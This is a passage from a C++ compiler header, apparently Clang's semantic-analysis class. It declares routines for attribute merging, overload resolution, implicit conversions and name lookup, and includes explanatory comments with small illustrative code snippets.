DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities determines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final priority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final value.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
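// For illustration, a hedged sketch of the interaction: an explicitly written
// attribute (AP_Explicit) takes precedence over one injected by the pragma
// (AP_PragmaClangAttribute), because it carries the lower priority value.
//
//   #pragma clang attribute push (__attribute__((availability(macos, introduced=10.12))), apply_to = function)
//   void f() __attribute__((availability(macos, introduced=10.14)));
//   #pragma clang attribute pop
//   // f keeps the explicitly written introduced=10.14 attribute.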
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef UuidAsWritten, MSGuidDecl *GuidDecl);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation.
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
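// For illustration, a hedged sketch of the three outcomes:
//
//   void f(int);
//   void f(double); // Ovl_Overload: different signature.
//   void f(int);    // Ovl_Match: signature matches the existing f(int).
//   // Had lookup found a non-function such as 'int f;', the result would
//   // be Ovl_NonFunction.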
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true,
bool ConsiderRequiresClauses = true);
enum class AllowedExplicit {
/// Allow no explicit functions to be used.
None,
/// Allow explicit conversion functions but not explicit constructors.
Conversions,
/// Allow both explicit conversion functions and explicit constructors.
All
};
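// For illustration, a hedged sketch of what each mode admits:
//
//   struct S {
//     explicit S(int);          // explicit constructor
//     explicit operator bool(); // explicit conversion function
//   };
//   // None:        neither explicit function is a candidate.
//   // Conversions: 'operator bool' may be considered, but 'S(int)' may not.
//   // All:         both are candidates.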
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
AllowedExplicit AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
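// For illustration, hedged examples of two of these contexts:
//
//   template <int N> struct A {};
//   constexpr short s = 42;
//   A<s> a;                           // CCEK_TemplateArg: the promotion
//                                     // short -> int is permitted.
//   enum class E : char { e = 1000 }; // CCEK_Enumerator: the conversion
//                                     // narrows, so it is ill-formed.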
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
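/// A ContextualImplicitConverter that accepts integral and (possibly scoped)
/// enumeration destination types.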
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as this
// ordering is relied on by the diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit as a series of notes all templates and non-templates identified by
// the expression Expr.
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfSingleOverloadCandidate(Expr *E, DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfSingleOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConversion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria are specified via the LookupCriteria enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
//@{
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up a name following ~ in a destructor name. This is an ordinary
/// lookup, but prefers tags to typedefs.
LookupDestructorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up implicit 'self' parameter of an objective-c method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
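// For illustration, a hedged sketch of the operator forms these results
// correspond to, for the literal 1.5 with various suffixes:
//
//   long double operator""_w(long double);  // LOLR_Cooked: receives 1.5L.
//   int operator""_r(const char *);         // LOLR_Raw: receives "1.5".
//   template <char...> int operator""_t();  // LOLR_Template: instantiated
//                                           //   with <'1', '.', '5'>.
//
// LOLR_StringTemplate corresponds to the string literal operator template
// extension, which additionally receives the character type.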
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
